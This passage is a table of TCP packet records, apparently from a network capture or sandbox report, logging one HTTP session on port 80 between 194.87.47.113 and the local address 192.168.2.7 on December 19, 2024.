Dec 19, 2024 08:47:35.799730062 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.799938917 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.800319910 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.800465107 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.800625086 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.801156998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.801309109 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.801388025 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.801935911 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.802122116 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.802202940 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.802686930 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.802907944 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.802975893 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.803461075 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.804069996 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.804167986 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.804307938 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.804316044 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.804352999 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.805037022 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.805331945 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.805391073 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.805841923 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.806051016 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.806109905 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.806665897 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.806828976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.806900978 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.807521105 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.807835102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.807883978 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.808314085 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.808486938 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.808660030 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.809108019 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.809683084 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.809814930 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.810094118 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.810576916 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.810653925 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.810818911 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.811069965 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.811201096 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.811531067 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.811945915 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.812062025 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.812350988 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.812364101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.812418938 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.812930107 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.813350916 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.813422918 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.813833952 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.813952923 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.814074993 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.814537048 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.814980030 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.815043926 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.815386057 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.815557003 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.815601110 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.816145897 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.816155910 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.816207886 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.816910982 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.817616940 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.817692995 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.817821026 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.817828894 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.817909956 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.818548918 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.819154024 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.819225073 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.819323063 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.819657087 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.819706917 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.820133924 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.820358992 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.820422888 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.820930004 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.821269989 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.821351051 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.821707010 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.822113991 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.822165966 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.822469950 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.822825909 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.822873116 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.823266029 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.823482990 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.823555946 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.824157953 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.824310064 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.824377060 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.824830055 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.825051069 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.825129986 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.825625896 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.825907946 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.825992107 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.826422930 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.826618910 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.826668978 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.827181101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.872262001 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.978076935 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.978234053 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.978605032 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.978701115 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.979094982 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.979125977 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.979336977 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.979479074 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.979780912 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.980115891 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.980186939 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.980285883 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.980761051 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.980954885 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.981312990 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.981395006 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.981950998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.981959105 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.982333899 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.982558966 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.982822895 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.983259916 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.983375072 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.983386993 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.983525038 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.984110117 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.984425068 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.984657049 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.984939098 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.984945059 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.985124111 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.985676050 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.985985994 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.986262083 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.986490011 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.986498117 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.986566067 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.987308025 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.987484932 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.987646103 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.988120079 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.988126993 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.988823891 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.989394903 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.989394903 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.989660978 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.989667892 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.989814043 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.990003109 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.990464926 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.990559101 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.991257906 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.991266012 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.991343975 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.991604090 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.992047071 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.992054939 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.992108107 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.992881060 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.992950916 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.993607998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.993614912 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.993681908 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.993940115 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.994442940 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.994528055 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.995229959 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.995238066 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.995333910 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.995547056 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.995975971 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.996124983 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.996802092 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.996810913 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.997010946 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.997107983 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.997606039 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.997612953 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.997766018 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.998554945 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.998606920 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.999192953 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.999200106 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.999332905 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.999509096 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.999968052 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.999975920 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.000205994 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.000735044 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.001290083 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.001535892 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.001543999 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.001652002 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.001852989 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.002352953 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.002430916 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.003130913 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.003139019 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.003334045 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.003436089 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.003961086 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.003968954 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.004419088 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.004671097 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.004817963 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.004851103 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.005515099 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.005525112 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.005631924 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.006273985 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.006546974 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.007069111 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.007076979 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.007144928 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.007411957 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.007870913 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.007878065 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.007956982 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.008724928 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.008794069 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.009639025 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.009653091 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.009708881 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.010051966 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.010420084 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.010499001 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.011101961 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.011115074 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.011219978 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.011374950 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.011833906 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.011847019 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.011946917 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.012634039 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.012691975 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.012831926 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.013401031 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.013453960 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.013622046 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.014221907 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.014292955 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.014504910 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.015033960 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.015045881 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.015145063 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.016527891 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.016623974 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.017278910 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.017307997 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.017393112 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.018069983 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.018083096 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.018094063 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.018143892 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.018944025 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.018956900 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.019377947 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.019522905 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.019535065 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.019558907 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.075344086 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.170270920 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.170453072 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.170736074 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.170770884 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.170916080 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.171025991 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.171274900 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.171755075 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.171801090 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.172051907 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.172367096 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.172668934 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.172672987 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.173156977 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.173170090 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.173214912 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.173957109 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.174006939 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.174174070 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.174736977 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.174748898 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.174784899 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.175493956 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.175550938 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.175669909 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.176310062 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.176367998 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.176491976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.177122116 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.177180052 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.177297115 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.178179979 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.178309917 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.178313971 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.178659916 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.178714991 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.179002047 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.179498911 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.179582119 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.179747105 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.180383921 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.180469036 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.180538893 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.181099892 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.181149006 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.181323051 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.182017088 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.182125092 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.182142973 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.182682991 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.182750940 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.182977915 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.183510065 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.183612108 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.183614016 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.184276104 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.184326887 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.184880972 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.185101032 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.185116053 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.185168028 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.185823917 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.185868979 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.186131001 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.186661959 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.186675072 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.186706066 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.187398911 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.187494993 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.187697887 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.188230991 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.188245058 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.188291073 CET	49707	80	192.168.2.7	194.87.47.113
